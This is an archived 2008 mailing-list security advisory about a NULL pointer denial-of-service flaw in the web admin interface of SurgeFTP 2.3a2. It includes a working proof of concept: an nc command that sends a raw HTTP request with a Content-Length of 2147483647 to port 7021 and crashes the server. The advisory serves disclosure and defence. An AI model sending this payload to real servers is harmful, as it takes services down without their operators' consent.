[NT] SurgeFTP NULL Pointer
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 26 Feb 2008 15:42:08 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SurgeFTP NULL Pointer
------------------------------------------------------------------------
SUMMARY
<http://www.netwinsite.com/surgeftp/> SurgeFTP is "a commercial FTP
server which supports also SSL/TLS and has a web interface for remote
administration". A vulnerability in the way SurgeFTP's web management
interface handles invalid Content-Length values allows remote attackers to
cause it to crash.
DETAILS
Vulnerable Systems:
* SurgeFTP version 2.3a2
When a Content-Length parameter is received from the client, SurgeFTP
tries to allocate the amount of memory (max 2147483647 bytes) specified in
this field and then copies the data in the resulted new buffer. The
problem is in the lack of checks on the result of the allocation which
leads to the crash of the entire server during the copying of the data to
a NULL pointer if that amount of memory cannot be allocated.
Exploit:
Send the following content using the following command:
nc SERVER 7021 -v -v < surgeftpizza.txt
Content:
GET / HTTP/1.0
Content-Length: 2147483647
boom
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [TOOL] Creddump - Extracts Credentials from Windows Registry Hives
- Next by Date: [NEWS] Cisco Unified CallManager Multiple SQL Injections in User And Admin Interface
- Previous by thread: [TOOL] Creddump - Extracts Credentials from Windows Registry Hives
- Next by thread: [NEWS] Cisco Unified CallManager Multiple SQL Injections in User And Admin Interface
- Index(es):
Relevant Pages
|
|
